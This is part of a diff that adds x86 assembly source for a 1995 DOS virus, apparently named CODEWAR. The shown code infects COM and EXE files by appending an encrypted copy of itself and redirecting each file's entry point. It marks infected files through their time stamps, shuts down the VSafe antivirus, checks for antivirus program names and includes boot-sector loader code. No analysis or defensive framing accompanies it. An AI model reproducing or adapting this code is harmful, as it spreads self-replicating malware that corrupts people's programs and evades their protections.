+;----------------------------------------------------------------------------\r
+Is_COM:\r
+Is_EXE:\r
+\r
+; Check if infected\r
+        mov     ax,es:[di.SFT_File_Time]\r
+        and     al,00011111b\r
+        cmp     al,Time_Stamp\r
+        jz      Close_Exit\r
+\r
+        PUSH    ES\r
+        PUSH    DI\r
+\r
+; Datum/Zeit sichern\r
+        mov     ax,es:[di.SFT_File_Time]\r
+        mov     cs:[ofs Old_Time -Reloc],ax\r
+        mov     ax,es:[di.SFT_File_Date]\r
+        mov     cs:[ofs Old_Date -Reloc],ax\r
+\r
+; Get file length directly from the SFT and save it\r
+        mov     ax,es:[di+SFT_File_SizeLo]\r
+        mov     cs:[ofs File_SizeLo -Reloc], ax\r
+        mov     ax,es:[di.SFT_File_SizeHi]\r
+        mov     cs:[ofs File_SizeHi -Reloc], ax\r
+\r
+; Force read/write mode\r
+        mov     word ptr es:[di.SFT_Open_Mode],2\r
+\r
+        CALL    Read_Infect\r
+\r
+        POP     DI\r
+        POP     ES\r
+\r
+Close_Exit:\r
+\r
+        MOV     AH,3Eh\r
+        INT     21h\r
+\r
+File_Error:\r
+        XOR     SI,SI\r
+        MOV     DS,SI\r
+\r
+; restore INT 24h\r
+\r
+        POP     AX\r
+        POP     ES\r
+\r
+        MOV     DS:[4*24h],AX\r
+        MOV     DS:[4*24h +2],ES\r
+\r
+\r
+        pop     es ds\r
+        popa\r
+\r
+        JMP     Exit_Int_21\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+goto_Infect_Ret:\r
+        jmp     Infect_Ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Process_EXE:\r
+        mov    byte ptr cs:[ofs File_Type -Reloc],File_Type_EXE\r
+\r
+; save handle\r
+        mov     word ptr cs:[ofs Handle -Reloc],bx\r
+\r
+; Dont infect to big/small EXE-files!\r
+        mov     word ptr AX,cs:[ofs File_Buffer.BUF_4h -Reloc]  ; EXE size in 512 byte pages\r
+        cmp     AX,F_Min_LengthEXE                              ; Don't infect files less than xxxx pages\r
+        JB      goto_Infect_Ret\r
+        cmp     AX,F_Max_LengthEXE                              ; Or bigger than xxxx pages\r
+        JA      goto_Infect_Ret\r
+\r
+; save handle\r
+        push    bx\r
+\r
+; seek to EOF\r
+\r
+        CALL    Seek_EOF\r
+\r
+\r
+; It's OK!  Process it now !\r
+        les     ax,dword ptr cs:[File_Buffer.Buf_14h -Reloc]    ;Entry_Point_Disp\r
+        mov     cs:[ofs Old_IP -Reloc],ax\r
+        mov     cs:[ofs Old_CS -Reloc],es\r
+\r
+        les     ax,dword ptr cs:[File_Buffer.Buf_eh -Reloc]     ;Stack_Disp\r
+        mov     cs:[ofs Old_SS -Reloc],ax\r
+        mov     cs:[ofs Old_SP -Reloc],es\r
+\r
+        mov     ax,cs:[ofs File_Buffer.Buf_8h -Reloc]  ; = Header size in paras\r
+        mov     cl,4\r
+        shl     ax,cl                                    ; Convert to byte-format\r
+\r
+; Get file size from SFT\r
+        push    ax                                       ; Save header size\r
+        mov     ax,cs:[ofs File_SizeLo -Reloc]\r
+        mov     dx,cs:[ofs File_SizeHi -Reloc]\r
+\r
+; add the padding-number\r
+        mov     cx,cs:[ofs File_SizeLo -Reloc]\r
+        MOV     CH,CL\r
+        MOV     CL,16\r
+        SUB     CL,CH\r
+        AND     CX,1+2+4+8\r
+        add     ax,cx\r
+\r
+; save the padding-number\r
+        mov     cs:[ofs Padded -reloc],cx\r
+\r
+        pop     bx                                       ; = Header size\r
+\r
+        sub     ax,bx                   ; DX:AX := file size - header size\r
+        sbb     dx,0\r
+\r
+        mov     cx,16                   ; Convert to seg:ofs format\r
+\r
+        div     cx                      ; DX:AX := (DX:AX) / 10h\r
+\r
+        or      dx,dx                   ; IP\r
+        jz      was_rounded\r
+\r
+        xor     dx,dx\r
+        mov     cs:[ofs File_Buffer.Buf_14h -Reloc],dx              ; New IP\r
+        mov     cs:[ofs File_Buffer.Buf_16h -Reloc],ax              ; New CS\r
+\r
+        inc     word ptr cs:[ofs File_Buffer.Buf_16h -Reloc]                 ; CS\r
+        jmp     rounded\r
+\r
+was_rounded:\r
+        mov     cs:[ofs File_Buffer.Buf_14h -Reloc],dx              ; New IP\r
+        mov     cs:[ofs File_Buffer.Buf_16h -Reloc],ax              ; New CS\r
+\r
+rounded:\r
+        inc     ax                                                  ; Avoid the "K" TB-flag (seems unecessary)\r
+        mov     word ptr cs:[ofs File_Buffer.Buf_eh -Reloc],ax      ; New SS\r
+        mov     word ptr cs:[ofs File_Buffer.Buf_10h -Reloc],0      ; New SP\r
+\r
+        mov     ax,cs:[ofs File_SizeLo -Reloc]\r
+        mov     dx,cs:[ofs File_SizeHi -Reloc]\r
+\r
+; add the padding-number\r
+        add     ax,cs:[ofs Padded -reloc]\r
+        add     dx,0\r
+\r
+\r
+        add     ax,Virus_Length         ; Lo-word\r
+        adc     dx,0                    ; Hi-word\r
+\r
+        push    ax                      ; Lo-word\r
+        shr     ax,9                    ;\r
+        ror     dx,9\r
+        stc\r
+        adc     dx,ax\r
+        pop     ax\r
+\r
+        and     ah,1                                           ; Mod 512\r
+        mov     cs:[ofs File_Buffer.Buf_4h -Reloc],dx               ; Size in pages (rounded up)\r
+        mov     cs:[ofs File_Buffer.Buf_2h -Reloc],ax               ; Size of last page (in bytes)\r
+\r
+        push    cs cs\r
+        pop     ds es\r
+\r
+\r
+        mov     word ptr bx,cs:[ofs Handle -Reloc]\r
+        mov     ax,cs:[ofs File_SizeLo -Reloc]\r
+\r
+        CALL    Padding\r
+\r
+; Construct index for decryptor\r
+\r
+        PUSH    AX\r
+\r
+        MOV     word ptr DS:[ofs E1_Idx_Val -Reloc],(ofs E1_Encrypted_Code-ofs Vir_start)-Camouf\r
+        MOV     word ptr DS:[ofs E2_Idx_Val -Reloc],(ofs E2_Encrypted_Code-ofs Vir_start)\r
+        MOV     word ptr DS:[ofs E3_Idx_Val -Reloc],(ofs E3_Encrypted_Code-ofs Vir_start)\r
+\r
+        POP     AX\r
+\r
+        pop     bx\r
+        jmp     Attach\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Read_Infect:\r
+\r
+        CALL    Seek_TOF\r
+\r
+; read xx bytes\r
+\r
+        MOV     AH,3Fh\r
+        MOV     CX,Header_Length\r
+        MOV     DX,ofs File_buffer -Reloc\r
+        INT     21h\r
+        jnb     read_ok\r
+        jmp     Infect_Ret\r
+\r
+read_ok:\r
+        cmp     word ptr cs:[ofs File_buffer -Reloc],"ZM"\r
+        jnz     Process_COM\r
+        jmp     Process_EXE\r
+\r
+;----------------------------------------------------------------------------\r
+Process_COM:\r
+\r
+        mov    byte ptr cs:[ofs File_Type -Reloc],File_Type_COM\r
+\r
+\r
+; seek to EOF\r
+\r
+        CALL    Seek_EOF\r
+\r
+; Save 3 bytes\r
+\r
+        MOV     ax,word ptr DS:[File_buffer -Reloc]\r
+        MOV     DS:[ofs Rest1 -Reloc],ax\r
+        MOV     al,byte ptr DS:[File_buffer -Reloc +2]\r
+        MOV     DS:[ofs Rest2 -Reloc],al\r
+\r
+        CALL    Seek_EOF\r
+\r
+; file smaller than xxxx bytes ?\r
+\r
+        CMP     AX,F_Min_LengthCOM\r
+        JB      Infect_Ret\r
+\r
+; file larger than xxxx bytes ?\r
+\r
+        CMP     AX,F_Max_LengthCOM\r
+        JA      Infect_Ret\r
+\r
+\r
+        CALL    Padding\r
+\r
+\r
+; Construct index for decryptor\r
+\r
+        PUSH    AX\r
+\r
+; layer 1\r
+        ADD     AX,100h+ (ofs E1_Encrypted_Code-ofs Vir_Start)-Camouf\r
+        MOV     DS:[ofs E1_Idx_Val -Reloc],AX\r
+\r
+; layer 2\r
+        pop     ax\r
+        push    ax\r
+\r
+        ADD     AX,100h+ (ofs E2_Encrypted_Code-ofs Vir_Start)\r
+        MOV     DS:[ofs E2_Idx_Val -Reloc],AX\r
+\r
+; layer 3\r
+        pop     ax\r
+        push    ax\r
+\r
+        ADD     AX,100h+ (ofs E3_Encrypted_Code-ofs Vir_Start)\r
+        MOV     DS:[ofs E3_Idx_Val -Reloc],AX\r
+\r
+\r
+        POP     AX\r
+\r
+; construct and insert a JUMP-INSTR.\r
+\r
+        MOV     byte ptr DS:[File_buffer -Reloc],0E9h\r
+        SUB     AX,3\r
+        MOV     word ptr DS:[File_buffer+1 -Reloc],AX\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Attach:\r
+\r
+; write body at EOF\r
+\r
+        MOV     AH,40h\r
+        MOV     CX,Virus_Length\r
+        MOV     DX,ofs Buffer -Reloc\r
+        CALL    Encrypt_Virus\r
+        INT     21h\r
+        JB      Infect_Ret\r
+\r
+; write JUMP to TOF\r
+\r
+        MOV     AL,0\r
+        CALL    Seek_TOF\r
+\r
+        MOV     AH,40h\r
+        MOV     CX,Header_Length\r
+        MOV     DX,ofs File_buffer -Reloc\r
+        INT     21h\r
+\r
+; restore time stamps\r
+\r
+        mov     AX,5701h\r
+        mov     cx,cs:[ofs Old_Time -Reloc]\r
+        mov     dx,cs:[ofs Old_Date -Reloc]\r
+        and     cl,11100000b\r
+        or      cl,Time_Stamp                      ; Mark with Time-ID\r
+        INT     21h\r
+\r
+Infect_Ret:\r
+        RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Padding:\r
+        MOV     AH,AL\r
+        MOV     AL,16\r
+        SUB     AL,AH\r
+        AND     AX,1+2+4+8\r
+        MOV     DX,AX\r
+\r
+; seek forward\r
+        MOV     AL,01h\r
+        call    Seek_File\r
+        ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Deinstall_Vsafe:\r
+        pusha\r
+        push    ds es\r
+\r
+        MOV     DX,5945h\r
+        MOV     AX,0FA01h\r
+        INT     16h\r
+\r
+        pop     es ds\r
+        popa\r
+        ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Check_If_AV_Name proc near\r
+        cmp     byte ptr es:[di.SFT_File_Name],"L"\r
+        jz      Found_AV_Name\r
+        cmp     byte ptr es:[di.SFT_File_Name],"-"\r
+        jz      Found_AV_Name\r
+        cmp     word ptr es:[di.SFT_File_Name],"BT"\r
+        jz      Found_AV_Name\r
+        cmp     word ptr es:[di.SFT_File_Name],"CS"\r
+        jz      Found_AV_Name\r
+        cmp     word ptr es:[di.SFT_File_Name],"-F"\r
+        jz      Found_AV_Name\r
+        cmp     word ptr es:[di.SFT_File_Name],"IV"\r
+        jz      Found_AV_Name\r
+Found_AV_Name:\r
+        ret\r
+Check_If_AV_Name endp\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Seek_EOF:\r
+        MOV     AL,02h\r
+Seek_TOF:\r
+        XOR     DX,DX\r
+Seek_File:\r
+        MOV     AH,42h\r
+        XOR     CX,CX\r
+        INT     21h\r
+        RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Call_Old_Int21 PROC NEAR\r
+        pushf\r
+        call    dword ptr cs:(ofs Old_Int_21 -Reloc)\r
+        ret\r
+Call_Old_Int21 ENDP\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Call_Old_Int2F PROC NEAR\r
+        pushf\r
+        call    dword ptr cs:(ofs Old_Int_2F -Reloc)\r
+        ret\r
+Call_Old_Int2F ENDP\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+New_Int_24:\r
+        MOV     AL,03h\r
+        IRET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Old_Int_13      dd      0\r
+Old_Int_1C      dd      0\r
+Old_Int_21      dd      0\r
+\r
+Old_Int_2f      dd      0\r
+\r
+Old_Time        dw      0\r
+Old_Date        dw      0\r
+\r
+Handle          dw      0\r
+\r
+; If Int 21h allready captured then 1 else 0\r
+Got_Int_21      db      0\r
+\r
+File_SizeHi     dw      0\r
+File_SizeLo     dw      0\r
+\r
+Padded          dw      0\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+BS_first_word   dw      0\r
+Old_BS_code     db      32 dup ('B')\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; The first word of the PAR/BS is stored here\r
+\r
+JBS_first_word:\r
+        jmp     $ + 60h\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Start_JBoot:\r
+        XOR     DI,DI\r
+        MOV     SI,7C00h\r
+\r
+        CLI\r
+        MOV     SP,SI\r
+        MOV     SS,DI\r
+        STI\r
+\r
+; read xx sectors to 7e00h\r
+\r
+        MOV     ES,DI\r
+        MOV     AX,0204h                        ; !!!!!!  Sectors !!!!!!\r
+        MOV     BX,7c00h+512\r
+\r
+        MOV     CX,1234h\r
+        ORG     $-2\r
+Ptc_CX  dw      0004h\r
+\r
+        MOV     DX,1234h\r
+        ORG     $-2\r
+Ptc_DX  dw      0080h\r
+\r
+        nop\r
+        nop\r
+\r
+        INT     13h\r
+\r
+; Jump to the reload code from 2 sectors\r
+; The offset in the BS/PAR where this instuction is executed is at\r
+; BS/PAR:60h+($-Start_Jboot)\r
+\r
+        jmp     $ + 512 - ($-Start_Jboot+60h)       ;+512 -125\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+        db      " [[  Cú0úDúEúWúAúR  ]]  <32>  Germany  1995  "\r
+        db      "Virtually called to life & survival by"\r
+\r
+        db      "RGOEPMSQO & NJOENBOJBD"\r
+\r
+        db      " ==>= AllE GUtEN DiNGE SiND DREi  ==>=  "\r
+\r
+        db      0\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+Encrypted_Code_End      equ     $\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+File_buffer:\r
+        db      Header_Length dup ('H')\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; here is the virus copied and encrypted\r
+Buffer  equ     $\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+\r
+\r
+\r
+\r
+\r
+CODE    ENDS\r
+        END     Sample\r
+\r
+\r
+; CODEWAR.ASM\r
+\1a
\ No newline at end of file